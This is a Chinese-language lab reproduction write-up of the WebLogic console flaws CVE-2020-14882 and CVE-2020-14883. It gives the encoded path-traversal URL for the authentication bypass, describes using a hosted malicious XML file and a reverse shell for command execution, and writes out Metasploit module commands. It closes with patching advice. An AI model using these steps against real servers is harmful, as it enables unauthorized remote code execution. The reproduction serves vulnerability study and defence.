概述
CVE-2020-14882 允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883 允许后台任意用户通过 HTTP 协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个 GET 请求在远程 Weblogic 服务器上以未授权的任意用户身份执行命令。
受影响版本
Oracle WeblogicServer 10.3.6.0.0
Oracle WeblogicServer 12.1.3.0.0
Oracle WeblogicServer 12.2.1.3.0
Oracle WeblogicServer 12.2.1.4.0
Oracle WeblogicServer 14.1.1.0.0
环境搭建
Linux操作系统(Vulhub环境)
自行拉取镜像
docker-compose up -d
漏洞复现
访问漏洞URL:http://192.168.1.136:7001/console/login/LoginForm.jsp,发现需要登录。
然后访问 CVE-2020-14882 漏洞存在的未授权访问路径发现确实是存在未授权访问。URL:
http://192.168.1.136:7001/console/css/%252e%252e%252fconsole.portal
我们需要构造一个 XML 文件,来原来实现远程代码执行漏洞 CVE-2020-14883,并将其保存在 Weblogic 可以访问到的服务器上
在恶意的 xml 文件所在的文件夹里开启使用 python 开启 web 服务
执行代码
在容器内查看是否在 /tmp 目录下创建了 success 文件
我们还可以将反弹 shell 的命令加入到 xml 文件中
反弹成功,但是不知道为什么它自己执行 exit 退出了
还可以使用msf的 exploit/multi/http/weblogic_admin_handle_rce 模块,但是这个模块返回的 session 会很多。
use exploit/multi/http/weblogic_admin_handle_rceset rhost 192.168.1.136set lhost 192.168.1.129set target Linux Dropperrun
修复建议
1、安装Oracle官方补丁
2、暂时对外关闭后台 /console/console.portal 的访问权限。
- End -
原文始发于微信公众号(NS Demon团队):Weblogic管理控制台未授权远程命令执行(CVE-2020-14882、CVE-2020-14883)漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论